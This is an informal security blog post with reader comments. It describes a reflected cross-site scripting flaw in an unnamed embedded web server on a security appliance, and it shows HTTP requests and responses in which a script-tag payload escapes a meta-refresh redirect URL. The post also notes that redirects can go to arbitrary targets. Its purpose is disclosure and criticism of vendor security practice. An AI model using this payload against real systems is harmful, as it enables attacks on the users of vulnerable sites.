it's kinda similar to the xss introduced by an intermediate security device post from a bit back...
i see a little light-weight web server i'm not familiar with, and kinda assume it had to be made in the last i donno... 10 years? so these guys who made it are sitting around a table and they're like:
"hey, let's make (or buy) this simple http server that just does some simple stuff really well and *nothing else*, and use it as a workhorse for these expensive widgets we want to sell!"
and later, someone says:
"man, we need a simple http server to run this security service that authenticates unknown users" and they build it into a security-ish widget...
an unauthenticated user requests a page:
GET /somethin.aspx?foo=bar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; ...)
Accept: */*
Pragma: no-cache
Host: somehost.domain.tld
...
and the little server that could redirects them to authenticate:
HTTP/1.1 200 OK
Server: ********gw
Content-Type: text/html
...
<HTML><HEAD><TITLE>***********************Authentication Redirect</TITLE><META http-equiv="Cache-control" content="no-cache"><META http-equiv="Pragma" content="no-cache"><META http-equiv="Expires" content="-1"><META http-equiv="refresh" content="1; URL=https://an.auth.svr/login.html?redirect=http://somehost.domain.tld/somethin.aspx?foo=bar"></HEAD></HTML>
of course the server encodes the output reflected in th-...
GET /somethin.aspx?foo=bar"></head><body><script>alert('wot?')</script></body> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; ...)
Accept: */*
Pragma: no-cache
Host: somehost.domain.tld
...
HTTP/1.1 200 OK
Server: ********gw
Content-Type: text/html
...
<HTML><HEAD><TITLE>***********************Authentication Redirect</TITLE><META http-equiv="Cache-control" content="no-cache"><META http-equiv="Pragma" content="no-cache"><META http-equiv="Expires" content="-1"><META http-equiv="refresh" content="1; URL=https://an.auth.svr/login.html?redirect=http://somehost.domain.tld/sometin.aspx?foo=bar"></head><body><script>alert('wot?')</script></body>"></HEAD></HTML>
you've gotta wonder... how many code releases and updates has the server gone through, since... ummmm.... 2005? You know, have you thought about output encoding in the last *5 years* since an xss worm made headlines w/ mainstream media? how much revenue did this bring you in the last 5 years? annnnnd how much is a simple static or dynamic analysis?
that's not to say that this looks wormy, for a couple of reasons. plus, modern anti-xss filters seem to protect against it.
one interesting bit is that the redirect values are completely arbitrary and seamless in the browser, which mb makes a targeted attack easier because the victim URL can be anything...?
***note: the vuln here is _not_ in msnbc.com***
***another note: ie8 anti-xss filter disabled for this screenshot***
other than that, it doesn't look like anything terribly special really, and someone has prolly already posted somethin about it somewhere, cause you just kinda trip over it if get within 30 feet of the server...
anywho, that's all for now ;)
3 comments:
GoAheadWebs FTL. Just a guess, GoAheadWebs is one of the tiny webservers I see a lot, running on VxWorks, typically. I see crap like this on every embedded device I've ever looked at. Also lots of session ugliness and auth problems. Tends to happen when you have 500k of firmware to write a single-threaded web server in.
nice guess, but it's a different product ;)
i agree this type of low-level vuln occurs all too often...
and that's kinda the point of the post. when do we get to have a reasonable level of expectation that security products we pay for have been vetted for *at least* simple well-known vulnerabilities?
when do we see vendors saying "i'll spend an extra 30 cents on a chip than can implement the spec well" instead of saying "no one will notice, it'll be fine and we'll save a few dollars"?
i like your post and i enjoy reading it. thanks for sharing! CCTV Camera in London
Post a Comment